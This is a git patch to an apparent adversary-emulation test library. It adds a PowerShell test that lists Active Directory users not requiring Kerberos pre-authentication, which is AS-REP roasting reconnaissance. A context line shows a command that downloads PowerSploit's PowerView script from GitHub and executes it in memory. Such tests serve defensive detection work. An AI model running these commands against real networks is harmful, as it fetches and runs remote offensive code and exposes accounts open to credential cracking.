From 90285a3fe1daebca139580bfa1bf0218d5afb12f Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Thu, 25 Jun 2020 15:35:46 -0500
Subject: [PATCH] Update T1069.002.yaml (#1082)

test to enumerate accounts not requiring kerb preauth
---
 atomics/T1069.002/T1069.002.yaml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml
index 1b7a9355..ac73862b 100644
--- a/atomics/T1069.002/T1069.002.yaml
+++ b/atomics/T1069.002/T1069.002.yaml
@@ -78,4 +78,14 @@ atomic_tests:
   executor:
     command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
     name: powershell
-
+- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
+  description: |
+    When successful, accounts that do not require kerberos pre-auth will be returned
+    Requires the Active Directory module for powershell to be installed
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}